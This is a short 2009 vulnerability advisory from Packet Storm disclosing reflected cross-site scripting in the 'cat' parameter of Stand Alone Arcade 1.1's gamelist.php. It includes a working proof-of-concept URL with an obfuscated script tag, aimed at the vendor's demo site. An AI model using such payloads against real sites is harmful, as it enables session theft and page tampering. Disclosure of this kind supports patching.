Stand Alone Arcade 1.1 Cross Site Scripting

2009-08-26T00:00:00
ID PACKETSTORM:80682
Type packetstorm
Reporter Moudi
Modified 2009-08-26T00:00:00

Description

                                        
                                            `/*  
  
_____ _ ___ __   
| ____|_ _(_) \ \ / /_ _ _ _   
| _| \ \ / / | |\ \ /\ / / _` | | | |  
| |___ \ V /| | | \ V V / (_| | |_| |  
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |  
|___/   
_____   
|_ _|__ __ _ _ __ ___   
| |/ _ \/ _` | '_ ` _ \   
| | __/ (_| | | | | | |  
|_|\___|\__,_|_| |_| |_|  
  
Stand Alone Arcade 1.1 Remote XSS Vulnerabilities  
  
Discovered By : Moudi  
Contact : <m0udi@9.cn>  
Download : http://standalonearcade.com/  
  
Greetings : Mizoz, Zuka, str0ke, 599eme Man.  
Please visit: http://unkn0wn.ws/board/index.php  
  
*/  
  
[+] Exploit XSS:  
  
- Vulnerable code in gamelist.php (cat)  
  
- Poc:  
http://127.0.0.1/gamelist.php?cat=[XSS]  
  
http://standalonearcade.com/demo/gamelist.php?cat=1</title><ScRiPt%20%0a%0d>alert(405750665179)%3B</ScRiPt>  
`